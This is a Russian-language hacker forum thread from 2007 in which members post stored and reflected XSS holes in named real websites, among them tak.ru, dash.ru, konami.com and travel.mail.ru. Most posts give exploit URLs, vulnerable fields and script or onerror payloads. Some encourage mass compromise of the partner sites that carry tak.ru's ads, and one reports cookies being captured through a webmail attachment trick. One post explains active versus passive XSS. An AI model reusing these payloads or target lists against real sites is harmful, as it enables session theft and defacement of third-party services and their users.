Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    http://emo.nnov.ru/

    Очень популярный сайт эморей :D

    Уязвимо поле E-mail:

    Code:
    [email protected]"><script>alert()</script>
     
    1 person likes this.
  2. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    это пасив кажись

    в тему

    уязвимое поле comments
     
    #42 mr.The, 8 May 2007
    Last edited: 8 May 2007
  3. R0chez

    R0chez New Member

    Joined:
    22 Jan 2007
    Messages:
    4
    Likes Received:
    3
    Reputations:
    -1
    или в томже поле
    Code:
    </title><script>alert('xss')</script> 
    и от меня парочка багов )
    Code:
    http://www.hiidlane.ee/index.php?moodul=3&q="><script>alert(/xss/)</script>
    Code:
    http://www.turundusinfo.ee/?id=55&search="><script>alert('xss')</script>&search_src=all
     
  4. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    Вы можете отличить пассивную от активной?
     
  5. R0chez

    R0chez New Member

    Joined:
    22 Jan 2007
    Messages:
    4
    Likes Received:
    3
    Reputations:
    -1
    Нет. В чом разница ?
     
  6. Hawkins

    Hawkins Elder - Старейшина

    Joined:
    24 Jan 2007
    Messages:
    60
    Likes Received:
    31
    Reputations:
    5
    Для активной не нужно никаких действий со стороны пользователя.
     
  7. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    уязвимы почти все поля
     
  8. Luccifer

    Luccifer Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    49
    Likes Received:
    39
    Reputations:
    -4
    Тема нах..не нужная вот если бы вы выкладывали активные xss на таких почтовиках как :rambler.ru, yandex.ru или лучше всего mail.ru то это другое дело....а это все не иначе как МУСОР...не кому нах... не нужный=))))
    Пустая трата времни.
     
  9. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    Если ты такой умный сам там ищи.
    К тому же ты наверно слепой, потому что на всех перечисленных тобой сайтах выкладывали уже хсс.
     
  10. Luccifer

    Luccifer Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    49
    Likes Received:
    39
    Reputations:
    -4
    Но не все работают по сей день.Я именно про активные....
     
    #50 Luccifer, 9 May 2007
    Last edited: 9 May 2007
  11. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Активная XSS (сохраненная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных одним пользователем, сохраненных в системе и доступных для вывода другим пользователям системы.

    Т.е. в общем актив это когда уязвимость сохраняется в системе и выдается всем пользователем зашедшим на страницу с уязвимым параметром.

    Пассивная XSS (переданная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу.

    Пассив в общем когда подсовывается ссылка пользователю, содержащая скрипт переданный в уязвимом параметре. Сработает один раз когда пользователь перейдет по специально сформированной ссылке, если же он перейдет на сайт по обычной ссылке, то ничего не произойдет.
     
  12. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Tak.ru
    При регистрации уязвимы поля Login, ФИО, Email
    Далее в настройках....
    Уязвимы поля Название сайты, ссылка на него...
    Так вот...
    На этом сайте зарегистрированны 37к человек и размещают их рекламу на своем сайте....
    И...в связи с этим...вы можете поломать множество сайтов...Как?
    Очень просто.....
    В панели управления, есть меню типа реклама..
    Так вот там можно ставить разделитель рекламы....
    Ставим
    Code:
    "><script>alert(/xss/)</script>
    И вот.....хсски на нашем сайте...
    А почему я сказал что другие сайты можем поломать??
    ПОтому что также здесь есть sql-inj, это вы найдете сами =)
     
  13. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    ыыыы, какой красивый домен mydak.ru
    http://www.mydak.ru/today.php
    Думаю сами знаете что и куда вствлять...
    на мои хек алерты не обращайте внимания =)
     
  14. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    http://dash.ru/
    При регистрации указываем маил :
    На мыло приходит ссылка для активации.
    http://dash.ru/user/?menu=setup
    При просмотре профиля или настроек вылезат алерт.
     
    1 person likes this.
  15. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    ll.oo.lv
    Регистрация, изменение профиля....
    Уязвимы все поля...
    Активная xss при просмотре профиля http://ll.oo.lv/?do=prof&user=SnooPI
    такой вот хек =)
     
  16. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    zgrk.com.ua

    пишем в теле письма
    Code:
    <img src='' onerror=alert(666)>
     
    2 people like this.
  17. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16

    Уязвимы поля First Name и Last Name.

    Пример запроса: '><script>alert('Hacked%20by%20XenOtai')</script>
     
  18. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    mail.ru yandex.ru rambler.ru

    отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
    минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)

    на мейле прикрыли. куки норм приходят только на рамблер.
     
    #58 freddi, 26 May 2007
    Last edited: 5 Jun 2007
    1 person likes this.
  19. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Code:
    http://www.konami.com/edealinv/servlet/ExecMacro?nurl=control/Registration.vm&ctl_nbr=3810
    Уязвимы многие поля, например Company Name и First Name.

    Пример запроса: "><script>alert('Hacked%20by%20XenOtai')</script>
     
    #59 XenOtai, 27 May 2007
    Last edited: 27 May 2007
    1 person likes this.
  20. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    travel.mail.ru

    Наводим мышкой на рисунОК


    Code:
    http://travel.mail.ru/account_photos_popup.php?account_id=4163847
    БуГагага..уже закрыли........10 часов жилаа...ххехехех))) ПРЕВЕД АДМИНАМ МАЙЛА... :p
     
    #60 DimOnOID, 29 May 2007
    Last edited: 30 May 2007
    2 people like this.